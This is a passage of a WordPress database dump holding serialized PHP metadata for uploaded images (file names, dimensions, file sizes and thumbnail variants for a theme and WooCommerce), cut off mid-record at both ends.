pg\";s:5:\"width\";i:600;s:6:\"height\";i:295;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45293;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4000;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(225,2435,'_wp_attached_file','2022/06/blog-02.jpg'),(226,2435,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:474;s:4:\"file\";s:19:\"2022/06/blog-02.jpg\";s:8:\"filesize\";i:162705;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"blog-02-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13716;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7049;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"blog-02-768x379.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72650;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-02-768x474.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101354;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-02-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45474;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:19:\"blog-02-378x474.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52202;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"blog-02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23622;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"blog-02-600x296.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45942;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3748;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(227,2436,'_wp_attached_file','2022/06/blog-03.jpg'),(228,2436,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:474;s:4:\"file\";s:19:\"2022/06/blog-03.jpg\";s:8:\"filesize\";i:114313;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"blog-03-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12720;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6926;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"blog-03-768x379.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55496;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-03-768x474.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74526;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-03-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36738;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:19:\"blog-03-378x474.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38986;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"blog-03-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21012;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"blog-03-600x296.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36729;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3945;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(229,2437,'_wp_attached_file','2022/06/blog-04.jpg'),(230,2437,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:474;s:4:\"file\";s:19:\"2022/06/blog-04.jpg\";s:8:\"filesize\";i:139031;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"blog-04-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13287;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6836;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"blog-04-768x379.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64199;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-04-768x474.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89999;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-04-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33624;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:19:\"blog-04-378x474.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36191;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"blog-04-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21003;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"blog-04-600x296.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42066;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-04-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3745;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(231,2653,'_wp_attached_file','2022/06/bg-contact-with-us.jpg'),(232,2653,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:509;s:4:\"file\";s:30:\"2022/06/bg-contact-with-us.jpg\";s:8:\"filesize\";i:174719;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"bg-contact-with-us-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7878;}s:5:\"large\";a:5:{s:4:\"file\";s:31:\"bg-contact-with-us-1024x271.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73271;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7509;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-768x204.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43327;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:31:\"bg-contact-with-us-1536x407.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:407;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150621;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-768x509.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113364;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57099;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-378x509.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66225;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127053;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:30:\"bg-contact-with-us-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29322;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-600x159.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27357;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:30:\"bg-contact-with-us-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3779;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(233,2821,'_wp_attached_file','2022/06/decor-get-to-khow-us-1.jpg'),(234,2821,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:320;s:6:\"height\";i:300;s:4:\"file\";s:34:\"2022/06/decor-get-to-khow-us-1.jpg\";s:8:\"filesize\";i:49813;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"decor-get-to-khow-us-1-300x281.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17545;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"decor-get-to-khow-us-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5860;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:34:\"decor-get-to-khow-us-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19756;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:34:\"decor-get-to-khow-us-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3273;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(235,2822,'_wp_attached_file','2022/06/decor-get-to-khow-us-dots.jpg.png'),(236,2822,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:119;s:6:\"height\";i:246;s:4:\"file\";s:41:\"2022/06/decor-get-to-khow-us-dots.jpg.png\";s:8:\"filesize\";i:3519;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"decor-get-to-khow-us-dots.jpg-119x150.png\";s:5:\"width\";i:119;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1792;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:41:\"decor-get-to-khow-us-dots.jpg-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1329;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(237,2823,'_wp_attached_file','2022/06/decor-get-to-khow-us-main.jpg'),(238,2823,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:430;s:6:\"height\";i:580;s:4:\"file\";s:37:\"2022/06/decor-get-to-khow-us-main.jpg\";s:8:\"filesize\";i:77508;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"decor-get-to-khow-us-main-222x300.jpg\";s:5:\"width\";i:222;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17399;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"decor-get-to-khow-us-main-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6805;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:37:\"decor-get-to-khow-us-main-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41080;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:37:\"decor-get-to-khow-us-main-378x580.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53996;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:37:\"decor-get-to-khow-us-main-430x473.jpg\";s:5:\"width\";i:430;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48406;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:37:\"decor-get-to-khow-us-main-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21512;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:37:\"decor-get-to-khow-us-main-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3735;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(239,2849,'_wp_attached_file','2022/06/blog-5.jpg'),(240,2849,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:474;s:4:\"file\";s:18:\"2022/06/blog-5.jpg\";s:8:\"filesize\";i:131711;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"blog-5-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11861;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"blog-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5946;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"blog-5-768x379.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58825;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:18:\"blog-5-768x474.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79230;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:18:\"blog-5-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33675;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:18:\"blog-5-378x474.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36800;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:18:\"blog-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19449;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"blog-5-600x296.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38231;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"blog-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3310;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(241,2849,'_wxr_import_parent','2835'),(242,2954,'_wp_attached_file','2022/06/mask-img-01.svg'),(243,2954,'_wp_attachment_metadata','a:3:{s:8:\"filesize\";i:312;s:5:\"width\";i:470;s:6:\"height\";i:520;}'),(245,2955,'_wp_attached_file','2022/06/mask-img-02.svg'),(246,2955,'_wp_attachment_metadata','a:3:{s:8:\"filesize\";i:311;s:5:\"width\";i:470;s:6:\"height\";i:520;}'),(248,2991,'_wp_attached_file','2022/06/pexels-lina-kivaka-1841143.jpg'),(249,2991,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:178;s:6:\"height\";i:178;s:4:\"file\";s:38:\"2022/06/pexels-lina-kivaka-1841143.jpg\";s:8:\"filesize\";i:53874;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"pexels-lina-kivaka-1841143-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21044;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:38:\"pexels-lina-kivaka-1841143-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18073;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(251,2996,'_wp_attached_file','2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg'),(252,2996,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:178;s:6:\"height\";i:178;s:4:\"file\";s:45:\"2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\";s:8:\"filesize\";i:24982;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"armin-djuhic-mcL2f-J74GY-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5642;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:45:\"armin-djuhic-mcL2f-J74GY-unsplash-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(254,3000,'_wp_attached_file','2022/06/bg-shape-architecture.png'),(255,3000,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:405;s:4:\"file\";s:33:\"2022/06/bg-shape-architecture.png\";s:8:\"filesize\";i:65388;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"bg-shape-architecture-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1651;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"bg-shape-architecture-1024x216.png\";s:5:\"width\";i:1024;s:6:\"height\";i:216;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12244;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:172;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-768x162.png\";s:5:\"width\";i:768;s:6:\"height\";i:162;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7761;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"bg-shape-architecture-1536x324.png\";s:5:\"width\";i:1536;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23565;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-768x405.png\";s:5:\"width\";i:768;s:6:\"height\";i:405;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:843;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-390x405.png\";s:5:\"width\";i:390;s:6:\"height\";i:405;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:620;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-378x405.png\";s:5:\"width\";i:378;s:6:\"height\";i:405;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:587;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-960x405.png\";s:5:\"width\";i:960;s:6:\"height\";i:405;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1725;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"bg-shape-architecture-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:477;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-600x127.png\";s:5:\"width\";i:600;s:6:\"height\";i:127;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5244;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-shape-architecture-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(257,3001,'_wp_attached_file','2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg'),(258,3001,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:178;s:6:\"height\";i:178;s:4:\"file\";s:42:\"2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\";s:8:\"filesize\";i:51830;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"minh-pham-OtXADkUh3-I-unsplash-150x150.jpg\";s:5